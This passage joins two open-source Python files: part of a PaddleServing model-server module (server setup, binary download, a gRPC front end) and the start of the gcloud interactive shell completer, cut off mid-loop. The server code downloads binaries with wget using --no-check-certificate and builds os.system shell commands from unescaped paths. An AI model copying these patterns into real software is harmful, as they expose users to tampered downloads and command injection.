google.protobuf.text_format.Parse(node_str, node)
self.workflow.nodes.extend([node])
def get_op_graph(self):
workflow_conf = server_sdk.WorkflowConf()
workflow_conf.workflows.extend([self.workflow])
return workflow_conf
class Server(object):
def __init__(self):
self.server_handle_ = None
self.infer_service_conf = None
self.model_toolkit_conf = None
self.resource_conf = None
self.memory_optimization = False
self.ir_optimization = False
self.model_conf = None
self.workflow_fn = "workflow.prototxt"
self.resource_fn = "resource.prototxt"
self.infer_service_fn = "infer_service.prototxt"
self.model_toolkit_fn = "model_toolkit.prototxt"
self.general_model_config_fn = "general_model.prototxt"
self.cube_config_fn = "cube.conf"
self.workdir = ""
self.max_concurrency = 0
self.num_threads = 2
self.port = 8080
self.reload_interval_s = 10
self.max_body_size = 64 * 1024 * 1024
self.module_path = os.path.dirname(paddle_serving_server.__file__)
self.cur_path = os.getcwd()
self.use_local_bin = False
self.gpuid = 0
self.model_config_paths = None # for multi-model in a workflow
def set_max_concurrency(self, concurrency):
self.max_concurrency = concurrency
def set_num_threads(self, threads):
self.num_threads = threads
def set_max_body_size(self, body_size):
if body_size >= self.max_body_size:
self.max_body_size = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def set_port(self, port):
self.port = port
def set_reload_interval(self, interval):
self.reload_interval_s = interval
def set_op_sequence(self, op_seq):
self.workflow_conf = op_seq
def set_op_graph(self, op_graph):
self.workflow_conf = op_graph
def set_memory_optimize(self, flag=False):
self.memory_optimization = flag
def set_ir_optimize(self, flag=False):
self.ir_optimization = flag
def check_local_bin(self):
if "SERVING_BIN" in os.environ:
self.use_local_bin = True
self.bin_path = os.environ["SERVING_BIN"]
def check_cuda(self):
cuda_flag = False
r = os.popen("ldd {} | grep cudart".format(self.bin_path))
r = r.read().split("=")
if len(r) >= 2 and "cudart" in r[1] and os.system(
"ls /dev/ | grep nvidia > /dev/null") == 0:
cuda_flag = True
if not cuda_flag:
raise SystemExit(
"CUDA not found, please check your environment or use cpu version by \"pip install paddle_serving_server\""
)
def set_gpuid(self, gpuid=0):
self.gpuid = gpuid
def _prepare_engine(self, model_config_paths, device):
if self.model_toolkit_conf == None:
self.model_toolkit_conf = server_sdk.ModelToolkitConf()
for engine_name, model_config_path in model_config_paths.items():
engine = server_sdk.EngineDesc()
engine.name = engine_name
# engine.reloadable_meta = model_config_path + "/fluid_time_file"
engine.reloadable_meta = self.workdir + "/fluid_time_file"
os.system("touch {}".format(engine.reloadable_meta))
engine.reloadable_type = "timestamp_ne"
engine.runtime_thread_num = 0
engine.batch_infer_size = 0
engine.enable_batch_align = 0
engine.model_data_path = model_config_path
engine.enable_memory_optimization = self.memory_optimization
engine.enable_ir_optimization = self.ir_optimization
engine.static_optimization = False
engine.force_update_static_cache = False
if device == "cpu":
engine.type = "FLUID_CPU_ANALYSIS_DIR"
elif device == "gpu":
engine.type = "FLUID_GPU_ANALYSIS_DIR"
self.model_toolkit_conf.engines.extend([engine])
def _prepare_infer_service(self, port):
if self.infer_service_conf == None:
self.infer_service_conf = server_sdk.InferServiceConf()
self.infer_service_conf.port = port
infer_service = server_sdk.InferService()
infer_service.name = "GeneralModelService"
infer_service.workflows.extend(["workflow1"])
self.infer_service_conf.services.extend([infer_service])
def _prepare_resource(self, workdir, cube_conf):
self.workdir = workdir
if self.resource_conf == None:
with open("{}/{}".format(workdir, self.general_model_config_fn),
"w") as fout:
fout.write(str(self.model_conf))
self.resource_conf = server_sdk.ResourceConf()
for workflow in self.workflow_conf.workflows:
for node in workflow.nodes:
if "dist_kv" in node.name:
self.resource_conf.cube_config_path = workdir
self.resource_conf.cube_config_file = self.cube_config_fn
if cube_conf == None:
raise ValueError(
"Please set the path of cube.conf while use dist_kv op."
)
shutil.copy(cube_conf, workdir)
self.resource_conf.model_toolkit_path = workdir
self.resource_conf.model_toolkit_file = self.model_toolkit_fn
self.resource_conf.general_model_path = workdir
self.resource_conf.general_model_file = self.general_model_config_fn
def _write_pb_str(self, filepath, pb_obj):
with open(filepath, "w") as fout:
fout.write(str(pb_obj))
def load_model_config(self, model_config_paths):
# At present, Serving needs the model path configured in the
# resource.prototxt file to determine the input and output format
# of the workflow, so the inputs and outputs of multiple models
# must be the same.
workflow_oi_config_path = None
if isinstance(model_config_paths, str):
# If there is only one model path, use the default infer_op.
# Because there are several infer_op types, we need to find
# it from workflow_conf.
default_engine_names = [
'general_infer_0', 'general_dist_kv_infer_0',
'general_dist_kv_quant_infer_0'
]
engine_name = None
for node in self.workflow_conf.workflows[0].nodes:
if node.name in default_engine_names:
engine_name = node.name
break
if engine_name is None:
raise Exception(
"You have set the engine_name of Op. Please use the form {op: model_path} to configure model path"
)
self.model_config_paths = {engine_name: model_config_paths}
workflow_oi_config_path = self.model_config_paths[engine_name]
elif isinstance(model_config_paths, dict):
self.model_config_paths = {}
for node_str, path in model_config_paths.items():
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
self.model_config_paths[node.name] = path
print("You have specified multiple model paths, please ensure "
"that the input and output of multiple models are the same.")
workflow_oi_config_path = list(self.model_config_paths.items())[0][
1]
else:
raise Exception("The type of model_config_paths must be str or "
"dict({op: model_path}), not {}.".format(
type(model_config_paths)))
self.model_conf = m_config.GeneralModelConfig()
f = open(
"{}/serving_server_conf.prototxt".format(workflow_oi_config_path),
'r')
self.model_conf = google.protobuf.text_format.Merge(
str(f.read()), self.model_conf)
# check config here
# print config here
def download_bin(self):
os.chdir(self.module_path)
need_download = False
#acquire lock
version_file = open("{}/version.py".format(self.module_path), "r")
import re
for line in version_file.readlines():
if re.match("cuda_version", line):
cuda_version = line.split("\"")[1]
device_version = "serving-gpu-cuda" + cuda_version + "-"
folder_name = device_version + serving_server_version
tar_name = folder_name + ".tar.gz"
bin_url = "https://paddle-serving.bj.bcebos.com/bin/" + tar_name
self.server_path = os.path.join(self.module_path, folder_name)
download_flag = "{}/{}.is_download".format(self.module_path,
folder_name)
fcntl.flock(version_file, fcntl.LOCK_EX)
if os.path.exists(download_flag):
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
return
if not os.path.exists(self.server_path):
os.system("touch {}/{}.is_download".format(self.module_path,
folder_name))
print('First-time run, downloading PaddleServing components ...')
r = os.system('wget ' + bin_url + ' --no-check-certificate')
if r != 0:
if os.path.exists(tar_name):
os.remove(tar_name)
raise SystemExit(
'Download failed, please check your network or permission of {}.'.
format(self.module_path))
else:
try:
print('Decompressing files ..')
tar = tarfile.open(tar_name)
tar.extractall()
tar.close()
except:
# `exe_path` was undefined in the original; clean up the partially extracted server directory instead
if os.path.exists(self.server_path):
shutil.rmtree(self.server_path)
raise SystemExit(
'Decompressing failed, please check your permission of {} or disk space left.'.
format(self.module_path))
finally:
os.remove(tar_name)
#release lock
version_file.close()
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
cube_conf=None):
if workdir == None:
workdir = "./tmp"
os.system("mkdir {}".format(workdir))
else:
os.system("mkdir {}".format(workdir))
os.system("touch {}/fluid_time_file".format(workdir))
if not self.port_is_available(port):
raise SystemExit("Port {} is already used".format(port))
self.set_port(port)
self._prepare_resource(workdir, cube_conf)
self._prepare_engine(self.model_config_paths, device)
self._prepare_infer_service(port)
self.workdir = workdir
infer_service_fn = "{}/{}".format(workdir, self.infer_service_fn)
workflow_fn = "{}/{}".format(workdir, self.workflow_fn)
resource_fn = "{}/{}".format(workdir, self.resource_fn)
model_toolkit_fn = "{}/{}".format(workdir, self.model_toolkit_fn)
self._write_pb_str(infer_service_fn, self.infer_service_conf)
self._write_pb_str(workflow_fn, self.workflow_conf)
self._write_pb_str(resource_fn, self.resource_conf)
self._write_pb_str(model_toolkit_fn, self.model_toolkit_conf)
def port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def run_server(self):
# just run server with system command
# currently we do not load cube
self.check_local_bin()
if not self.use_local_bin:
self.download_bin()
# wait for other process to download server bin
while not os.path.exists(self.server_path):
time.sleep(1)
else:
print("Use local bin : {}".format(self.bin_path))
self.check_cuda()
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-gpuid {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.gpuid,
self.max_body_size)
print("Going to Run Comand")
print(command)
os.system(command)
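# A minimal usage sketch (not part of this module) tying the pieces above together;
# the model directory, workdir, and port are placeholders.
def _server_usage_sketch():
    server = Server()
    server.set_op_sequence(_build_default_op_sequence())  # hypothetical helper defined above
    server.set_num_threads(4)
    server.set_gpuid(0)
    server.load_model_config("serving_server_model")  # placeholder model directory
    server.prepare_server(workdir="workdir_0", port=9292, device="gpu")
    server.run_server()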
class MultiLangServerServiceServicer(multi_lang_general_model_service_pb2_grpc.
MultiLangGeneralModelServiceServicer):
def __init__(self, model_config_path, is_multi_model, endpoints):
self.is_multi_model_ = is_multi_model
self.model_config_path_ = model_config_path
self.endpoints_ = endpoints
with open(self.model_config_path_) as f:
self.model_config_str_ = str(f.read())
self._parse_model_config(self.model_config_str_)
self._init_bclient(self.model_config_path_, self.endpoints_)
def _init_bclient(self, model_config_path, endpoints, timeout_ms=None):
from paddle_serving_client import Client
self.bclient_ = Client()
if timeout_ms is not None:
self.bclient_.set_rpc_timeout_ms(timeout_ms)
self.bclient_.load_client_config(model_config_path)
self.bclient_.connect(endpoints)
def _parse_model_config(self, model_config_str):
model_conf = m_config.GeneralModelConfig()
model_conf = google.protobuf.text_format.Merge(model_config_str,
model_conf)
self.feed_names_ = [var.alias_name for var in model_conf.feed_var]
self.feed_types_ = {}
self.feed_shapes_ = {}
self.fetch_names_ = [var.alias_name for var in model_conf.fetch_var]
self.fetch_types_ = {}
self.lod_tensor_set_ = set()
for i, var in enumerate(model_conf.feed_var):
self.feed_types_[var.alias_name] = var.feed_type
self.feed_shapes_[var.alias_name] = var.shape
if var.is_lod_tensor:
self.lod_tensor_set_.add(var.alias_name)
for i, var in enumerate(model_conf.fetch_var):
self.fetch_types_[var.alias_name] = var.fetch_type
if var.is_lod_tensor:
self.lod_tensor_set_.add(var.alias_name)
def _flatten_list(self, nested_list):
for item in nested_list:
if isinstance(item, (list, tuple)):
for sub_item in self._flatten_list(item):
yield sub_item
else:
yield item
def _unpack_inference_request(self, request):
feed_names = list(request.feed_var_names)
fetch_names = list(request.fetch_var_names)
is_python = request.is_python
feed_batch = []
for feed_inst in request.insts:
feed_dict = {}
for idx, name in enumerate(feed_names):
var = feed_inst.tensor_array[idx]
v_type = self.feed_types_[name]
data = None
if is_python:
if v_type == 0:
data = np.frombuffer(var.data, dtype="int64")
elif v_type == 1:
data = np.frombuffer(var.data, dtype="float32")
elif v_type == 2:
data = np.frombuffer(var.data, dtype="int32")
else:
raise Exception("error type.")
else:
if v_type == 0: # int64
data = np.array(list(var.int64_data), dtype="int64")
elif v_type == 1: # float32
data = np.array(list(var.float_data), dtype="float32")
elif v_type == 2:
data = np.array(list(var.int_data), dtype="int32")
else:
raise Exception("error type.")
data.shape = list(feed_inst.tensor_array[idx].shape)
feed_dict[name] = data
feed_batch.append(feed_dict)
return feed_batch, fetch_names, is_python
def _pack_inference_response(self, ret, fetch_names, is_python):
resp = multi_lang_general_model_service_pb2.InferenceResponse()
if ret is None:
resp.err_code = 1
return resp
results, tag = ret
resp.tag = tag
resp.err_code = 0
if not self.is_multi_model_:
results = {'general_infer_0': results}
for model_name, model_result in results.items():
model_output = multi_lang_general_model_service_pb2.ModelOutput()
inst = multi_lang_general_model_service_pb2.FetchInst()
for idx, name in enumerate(fetch_names):
tensor = multi_lang_general_model_service_pb2.Tensor()
v_type = self.fetch_types_[name]
if is_python:
tensor.data = model_result[name].tobytes()
else:
if v_type == 0: # int64
tensor.int64_data.extend(model_result[name].reshape(-1)
.tolist())
elif v_type == 1: # float32
tensor.float_data.extend(model_result[name].reshape(-1)
.tolist())
elif v_type == 2: # int32
tensor.int_data.extend(model_result[name].reshape(-1)
.tolist())
else:
raise Exception("error type.")
tensor.shape.extend(list(model_result[name].shape))
if name in self.lod_tensor_set_:
tensor.lod.extend(model_result["{}.lod".format(name)]
.tolist())
inst.tensor_array.append(tensor)
model_output.insts.append(inst)
model_output.engine_name = model_name
resp.outputs.append(model_output)
return resp
def SetTimeout(self, request, context):
# This process and the Inference process cannot run at the same time.
# For performance reasons, no thread lock is added for now.
timeout_ms = request.timeout_ms
self._init_bclient(self.model_config_path_, self.endpoints_, timeout_ms)
resp = multi_lang_general_model_service_pb2.SimpleResponse()
resp.err_code = 0
return resp
def Inference(self, request, context):
feed_dict, fetch_names, is_python = self._unpack_inference_request(
request)
ret = self.bclient_.predict(
feed=feed_dict, fetch=fetch_names, need_variant_tag=True)
return self._pack_inference_response(ret, fetch_names, is_python)
def GetClientConfig(self, request, context):
resp = multi_lang_general_model_service_pb2.GetClientConfigResponse()
resp.client_config_str = self.model_config_str_
return resp
class MultiLangServer(object):
def __init__(self):
self.bserver_ = Server()
self.worker_num_ = 4
self.body_size_ = 64 * 1024 * 1024
self.concurrency_ = 100000
self.is_multi_model_ = False # for model ensemble
def set_max_concurrency(self, concurrency):
self.concurrency_ = concurrency
self.bserver_.set_max_concurrency(concurrency)
def set_num_threads(self, threads):
self.worker_num_ = threads
self.bserver_.set_num_threads(threads)
def set_max_body_size(self, body_size):
self.bserver_.set_max_body_size(body_size)
if body_size >= self.body_size_:
self.body_size_ = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def set_port(self, port):
self.gport_ = port
def set_reload_interval(self, interval):
self.bserver_.set_reload_interval(interval)
def set_op_sequence(self, op_seq):
self.bserver_.set_op_sequence(op_seq)
def set_op_graph(self, op_graph):
self.bserver_.set_op_graph(op_graph)
def set_memory_optimize(self, flag=False):
self.bserver_.set_memory_optimize(flag)
def set_ir_optimize(self, flag=False):
self.bserver_.set_ir_optimize(flag)
def set_gpuid(self, gpuid=0):
self.bserver_.set_gpuid(gpuid)
def load_model_config(self, server_config_paths, client_config_path=None):
self.bserver_.load_model_config(server_config_paths)
if client_config_path is None:
if isinstance(server_config_paths, dict):
self.is_multi_model_ = True
client_config_path = '{}/serving_server_conf.prototxt'.format(
list(server_config_paths.items())[0][1])
else:
client_config_path = '{}/serving_server_conf.prototxt'.format(
server_config_paths)
self.bclient_config_path_ = client_config_path
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
cube_conf=None):
if not self._port_is_available(port):
raise SystemExit("Prot {} is already used".format(port))
default_port = 12000
self.port_list_ = []
for i in range(1000):
if default_port + i != port and self._port_is_available(default_port
+ i):
self.port_list_.append(default_port + i)
break
self.bserver_.prepare_server(
workdir=workdir,
port=self.port_list_[0],
device=device,
cube_conf=cube_conf)
self.set_port(port)
def _launch_brpc_service(self, bserver):
bserver.run_server()
def _port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
return result != 0
def run_server(self):
p_bserver = Process(
target=self._launch_brpc_service, args=(self.bserver_, ))
p_bserver.start()
options = [('grpc.max_send_message_length', self.body_size_),
('grpc.max_receive_message_length', self.body_size_)]
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.worker_num_),
options=options,
maximum_concurrent_rpcs=self.concurrency_)
multi_lang_general_model_service_pb2_grpc.add_MultiLangGeneralModelServiceServicer_to_server(
MultiLangServerServiceServicer(
self.bclient_config_path_, self.is_multi_model_,
["0.0.0.0:{}".format(self.port_list_[0])]), server)
server.add_insecure_port('[::]:{}'.format(self.gport_))
server.start()
p_bserver.join()
server.wait_for_termination()
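# A minimal usage sketch (not part of the original module; the model directory,
# workdir, and port below are illustrative assumptions). MultiLangServer wraps
# the brpc Server defined above and fronts it with a gRPC service:
#
#   multi_server = MultiLangServer()
#   multi_server.set_num_threads(4)
#   multi_server.set_op_sequence(op_seq)  # op sequence built by the caller
#   multi_server.load_model_config("serving_server_model")
#   multi_server.prepare_server(workdir="workdir", port=9393, device="cpu")
#   multi_server.run_server()  # blocks: brpc child process + gRPC frontend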
|
completer.py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The gcloud interactive shell completion."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import sys
import threading
import time
from googlecloudsdk.calliope import parser_completer
from googlecloudsdk.command_lib.interactive import parser
from googlecloudsdk.command_lib.meta import generate_cli_trees
from googlecloudsdk.core import module_util
from googlecloudsdk.core.console import console_attr
from prompt_toolkit import completion
import six
_INVALID_COMMAND_COUNT = -1
_INVALID_ARG_COMMAND_COUNT = _INVALID_COMMAND_COUNT - 1
_URI_SEP = '://'
# TODO(b/115505558): add a visual element test framework
def _GenerateCompletions(event):
"""completion.generate_completions override that auto selects singletons."""
b = event.current_buffer
if not b.complete_state:
# First TAB -- display the completions in a menu.
event.cli.start_completion(insert_common_part=True, select_first=False)
elif len(b.complete_state.current_completions) == 1:
# Second TAB with only one completion -- select it dadgummit.
b.apply_completion(b.complete_state.current_completions[0])
else:
# Second and subsequent TABs -- rotate through the menu.
b.complete_next()
completion.generate_completions = _GenerateCompletions # MONKEYPATCH!
def _PrettyArgs(args):
"""Pretty prints args into a string and returns it."""
buf = io.StringIO()
buf.write('[')
for arg in args:
buf.write('({},{})'.format(arg.value or '""', arg.token_type.name))
buf.write(']')
return buf.getvalue()
def _Split(path):
"""Returns the list of component names in path, treating foo:// as a dir."""
urisep = _URI_SEP
uri_index = path.find(urisep)
if uri_index >= 0:
n = uri_index + len(_URI_SEP)
return [path[:n-1]] + path[n:].split('/')
return path.split('/')
def _Dirname(path):
"""Returns the dirname of path, '' if it's '.'."""
return '/'.join(_Split(path)[:-1])
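# For reference (illustrative only): _Split('a/b/c') returns ['a', 'b', 'c']
# and _Dirname('a/b/c') returns 'a/b'; a 'foo://' scheme prefix is kept
# together as the leading component so URI roots behave like a directory.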
class CacheArg(object):
"""A completion cache arg."""
def __init__(self, prefix, completions):
self.prefix = prefix
self.completions = completions
self.dirs = {}
def IsValid(self):
return self.completions is not None
def Invalidate(self):
self.command_count = _INVALID_ARG_COMMAND_COUNT
self.completions = None
self.dirs = {}
class CompletionCache(object):
"""A per-arg cache of completions for the command line under construction.
Since we have no details on the completed values, this cache is only for the
current command line. This means that async activities by other commands
(creating files, instances, resources) may not be seen until the current
command under construction is executed.
Attributes:
args: The list of CacheArg args holding the completion state for each arg.
completer: The completer object.
command_count: The completer.cli.command_count value for the current cache.
"""
def __init__(self, completer):
self.args = []
self.completer = completer
self.command_count = _INVALID_COMMAND_COUNT
def IsValid(self):
return self.command_count == self.completer.cli.command_count
def ArgMatch(self, args, index):
"""Returns True if args[index] matches the cache prefix for index."""
if not self.args[index].IsValid():
# Only concerned with cached args.
return True
return args[index].value.startswith(self.args[index].prefix)
def Lookup(self, args):
"""Returns the cached completions for the last arg in args or None."""
# No joy if it's not cached or if the command has already executed.
if not args or not self.IsValid():
return None
if len(args) > len(self.args):
return None
# Args before the last must match the cached arg value.
last_arg_index = len(args) - 1
for i in range(last_arg_index):
if not self.ArgMatch(args, i):
return None
# The last arg must have completions and match the completion prefix.
if not self.args[last_arg_index].IsValid():
return None
# Check directory boundaries.
a = args[last_arg_index].value
if a.endswith('/'):
# Entering a subdir, maybe it's already cached.
parent = a[:-1]
self.completer.debug.dir.text(parent)
prefix, completions = self.args[last_arg_index].dirs.get(parent,
(None, None))
if not completions:
return None
self.args[last_arg_index].prefix = prefix
self.args[last_arg_index].completions = completions
elif a in self.args[last_arg_index].dirs:
# Backing up into a parent dir.
self.completer.debug.dir.text(_Dirname(a))
prefix, completions = self.args[last_arg_index].dirs.get(_Dirname(a),
(None, None))
if completions:
self.args[last_arg_index].prefix = prefix
self.args[last_arg_index].completions = completions
# The last arg must match the completion prefix.
if not self.ArgMatch(args, last_arg_index):
return None
# Found valid matching completions in the cache.
return [c for c in self.args[last_arg_index].completions if c.startswith(a)]
def Update(self, args, completions):
"""Updates completions for the last arg in args."""
self.command_count = self.completer.cli.command_count
last_arg_index = len(args) - 1
for i in range(last_arg_index):
if i >= len(self.args):
# Grow the cache.
self.args.append(CacheArg(args[i].value, None))
elif not self.ArgMatch(args, i):
self.args[i].Invalidate()
a = args[last_arg_index].value
# Extend the cache if necessary.
if last_arg_index == len(self.args):
self.args.append(CacheArg(a, completions))
# Update the last arg.
if (not self.args[last_arg_index].IsValid() or
not a.startswith(self.args[last_arg_index].prefix) or
a.endswith('/')):
if a.endswith('/'):
# Subdir completions.
if not self.args[last_arg_index].dirs:
# Default completions belong to ".".
self.args[last_arg_index].dirs[''] = (
self.args[last_arg_index].prefix,
self.args[last_arg_index].completions)
self.args[last_arg_index].dirs[a[:-1]] = (a, completions)
# Check for dir completions trying to slip by.
if completions and '/' in completions[0][:-1] and '/' not in a:
dirs = {}
for comp in completions:
if comp.endswith('/'):
comp = comp[:-1]
mark = '/'
else:
mark = ''
parts = _Split(comp)
if mark:
parts[-1] += mark
for i in range(len(parts)):
d = '/'.join(parts[:i])
if d not in dirs:
dirs[d] = []
comp = '/'.join(parts[:i + 1])
if comp.endswith(':/'):
comp += '/'
if comp not in dirs[d]:
dirs[d].append(comp)
for d, c in six.iteritems(dirs):
marked = d
if marked.endswith(':/'):
marked += '/'
self.args[last_arg_index].dirs[d] = marked, c
else:
self.args[last_arg_index].prefix = a
self.args[last_arg_index].completions = completions
# Invalidate the rest of the cache.
for i in range(last_arg_index + 1, len(self.args)):
self.args[i].Invalidate()
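# Illustration (a sketch, not executed): while a single command line is being
# composed, Update() records the completions returned for each arg, so a later
# Lookup() for a longer prefix of the same arg (e.g. 'gs://bucket/ob' after
# 'gs://bucket/') is answered by filtering the cached list instead of calling
# the completer again; the dirs map additionally remembers per-directory
# results so backing up into a parent directory is also a cache hit.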
class Spinner(object):
"""A Spinner to show when completer takes too long to respond.
Some completer calls take too long, especially those that fetch remote
resources. An instance of this class can be used as a context manager wrapping
slow completers to get spinmarks while the completer fetches.
Attributes:
_done_loading: Boolean flag indicating whether ticker thread is working.
_set_spinner: Function reference to InteractiveCliCompleter's spinner
setter.
_spin_marks: List of unicode spinmarks to be cycled while loading.
_ticker: Thread instance that handles displaying the spinner.
_ticker_index: Integer specifying the last iteration index in _spin_marks.
_TICKER_INTERVAL: Integer specifying the time between ticker rotations in
milliseconds.
_ticker_length: Integer specifying the length of _spin_marks.
_TICKER_WAIT: Integer specifying the wait time before ticking in milliseconds.
_TICKER_WAIT_CHECK_INTERVAL: Integer specifying the interval at which the
wait is re-checked, in milliseconds.
"""
_TICKER_INTERVAL = 100
_TICKER_WAIT = 200
_TICKER_WAIT_CHECK_INTERVAL = 10
def __init__(self, set_spinner):
self._done_loading = False
self._spin_marks = console_attr.GetConsoleAttr()\
.GetProgressTrackerSymbols().spin_marks
self._ticker = None
self._ticker_index = 0
self._ticker_length = len(self._spin_marks)
self._set_spinner = set_spinner
def _Mark(self, spin_mark):
"""Marks spin_mark on stdout and moves cursor back."""
sys.stdout.write(spin_mark + '\b')
sys.stdout.flush()
def Stop(self):
"""Erases last spin_mark and joins the ticker thread."""
self._Mark(' ')
self._done_loading = True
if self._ticker:
self._ticker.join()
def _Ticker(self):
"""Waits for _TICKER_WAIT and then starts printing the spinner."""
for _ in range(Spinner._TICKER_WAIT // Spinner._TICKER_WAIT_CHECK_INTERVAL):
time.sleep(Spinner._TICKER_WAIT_CHECK_INTERVAL/1000.0)
if self._done_loading:
break
while not self._done_loading:
spin_mark = self._spin_marks[self._ticker_index]
self._Mark(spin_mark)
self._ticker_index = (self._ticker_index + 1) % self._ticker_length
time.sleep(Spinner._TICKER_INTERVAL/1000.0)
def __enter__(self):
self._set_spinner(self)
self._ticker = threading.Thread(target=self._Ticker)
self._ticker.start()
return self
def __exit__(self, *args):
self.Stop()
self._set_spinner(None)
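# Typical use (sketch only; mirrors the call sites later in this module): wrap
# a potentially slow completer call so spin marks are printed while it runs.
#
#   with Spinner(self.SetSpinner):
#     choices = completer(prefix='')  # spinner starts ticking if this call
#                                     # outlasts _TICKER_WAIT milliseconds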
def _NameSpaceDict(args):
"""Returns a namespace dict given parsed CLI tree args."""
namespace = {}
name = None
for arg in args:
if arg.token_type == parser.ArgTokenType.POSITIONAL:
name = arg.tree.get(parser.LOOKUP_NAME)
value = arg.value
elif arg.token_type == parser.ArgTokenType.FLAG:
name = arg.tree.get(parser.LOOKUP_NAME)
if name:
if name.startswith('--'):
name = name[2:]
name = name.replace('-', '_')
continue
elif not name:
continue
elif arg.token_type == parser.ArgTokenType.FLAG_ARG:
value = arg.value
else:
continue
namespace[name] = value
return namespace
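# Example (hypothetical parsed args, for illustration only): for a command
# line like `... list --format json`, the FLAG token '--format' contributes
# the key 'format' and the following FLAG_ARG token contributes the value, so
# the returned dict includes {'format': 'json'} alongside any POSITIONAL
# values keyed by their CLI-tree names.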
class ModuleCache(object):
"""A local completer module cache item to minimize intra-command latency.
Some CLI tree positionals and flag values have completers that are specified
by module paths. These path strings point to a completer method or class that
can be imported at run-time. The ModuleCache keeps track of modules that have
already been imported, the most recent completion result, and a timeout for
the data. This saves on import lookup, and more importantly, repeated
completion requests within a short window. Users really love that TAB key.
Attributes:
_TIMEOUT: Newly updated choices stale after this many seconds.
completer_class: The completer class.
coshell: The coshell object.
choices: The cached choices.
stale: choices stale after this time.
"""
_TIMEOUT = 60
def __init__(self, completer_class):
self.completer_class = completer_class
self.choices = None
self.stale = 0
self.timeout = ModuleCache._TIMEOUT
class InteractiveCliCompleter(completion.Completer):
"""A prompt_toolkit interactive CLI completer.
This is the wrapper class for the get_completions() callback that is
called when characters are added to the default input buffer. It's a bit
hairy because it maintains state between calls to avoid duplicate work,
especially for completer calls of unknown cost.
cli.command_count is a serial number that marks the current command line in
progress. Some of the cached state is reset when get_completions() detects
that it has changed.
Attributes:
cli: The interactive CLI object.
coshell: The interactive coshell object.
debug: The debug object.
empty: Completion request is on an empty arg if True.
hidden: Complete hidden commands and flags if True.
last: The last character before the cursor in the completion request.
manpage_generator: The unknown command man page generator object.
module_cache: The completer module path cache object.
parsed_args: The parsed args namespace passed to completer modules.
parser: The interactive parser object.
prefix_completer_command_count: If this is equal to cli.command_count then
command PREFIX TAB completion is enabled. This completion searches PATH
for executables matching the current PREFIX token. It's fairly expensive
and voluminous, so we don't want to do it for every completion event.
_spinner: Private instance of Spinner used for loading during
ArgCompleter.
"""
def __init__(self, cli=None, coshell=None, debug=None,
interactive_parser=None, args=None, hidden=False,
manpage_generator=True):
self.arg_cache = CompletionCache(self)
self.cli = cli
self.coshell = coshell
self.debug = debug
self.hidden = hidden
self.manpage_generator = manpage_generator
self.module_cache = {}
self.parser = interactive_parser
self.parsed_args = args
self.empty = False
self._spinner = None
self.last = ''
generate_cli_trees.CliTreeGenerator.MemoizeFailures(True)
self.reset()
def reset(self):
"""Resets any cached state for the current command being composed."""
self.DisableExecutableCompletions()
if self._spinner:
self._spinner.Stop()
self._spinner = None
def SetSpinner(self, spinner):
"""Sets and Unsets current spinner object."""
self._spinner = spinner
def DoExecutableCompletions(self):
"""Returns True if command prefix args should use executable completion."""
return self.prefix_completer_command_count == self.cli.command_count
def DisableExecutableCompletions(self):
"""Disables command prefix arg executable completion."""
self.prefix_completer_command_count = _INVALID_COMMAND_COUNT
def EnableExecutableCompletions(self):
"""Enables command prefix arg executable completion."""
self.prefix_completer_command_count = self.cli.command_count
def IsPrefixArg(self, args):
"""Returns True if the input buffer cursor is in a command prefix arg."""
return not self.empty and args[-1].token_type == parser.ArgTokenType.PREFIX
def IsSuppressed(self, info):
"""Returns True if the info for a command, group or flag is hidden."""
if self.hidden:
return info.get(parser.LOOKUP_NAME, '').startswith('--no-')
return info.get(parser.LOOKUP_IS_HIDDEN)
def get_completions(self, doc, event):
"""Yields the completions for doc.
Args:
doc: A Document instance containing the interactive command line to
complete.
event: The CompleteEvent that triggered this completion.
Yields:
Completion instances for doc.
"""
self.debug.tabs.count().text('@{}:{}'.format(
self.cli.command_count,
'explicit' if event.completion_requested else 'implicit'))
# TAB on empty line toggles command PREFIX executable completions.
if not doc.text_before_cursor and event.completion_requested:
if self.DoExecutableCompletions():
self.DisableExecutableCompletions()
else:
self.EnableExecutableCompletions()
return
# Parse the arg types from the input buffer.
args = self.parser.ParseCommand(doc.text_before_cursor)
if not args:
return
# The default completer order.
completers = (
self.CommandCompleter,
self.FlagCompleter,
self.PositionalCompleter,
self.InteractiveCompleter,
)
# Command PREFIX token may need a different order.
if self.IsPrefixArg(args) and (
self.DoExecutableCompletions() or event.completion_requested):
completers = (self.InteractiveCompleter,)
self.last = doc.text_before_cursor[-1] if doc.text_before_cursor else ''
self.empty = self.last.isspace()
self.event = event
self.debug.last.text(self.last)
self.debug.tokens.text(_PrettyArgs(args))
# Apply the completers in order stopping at the first one that does not
# return None.
for completer in completers:
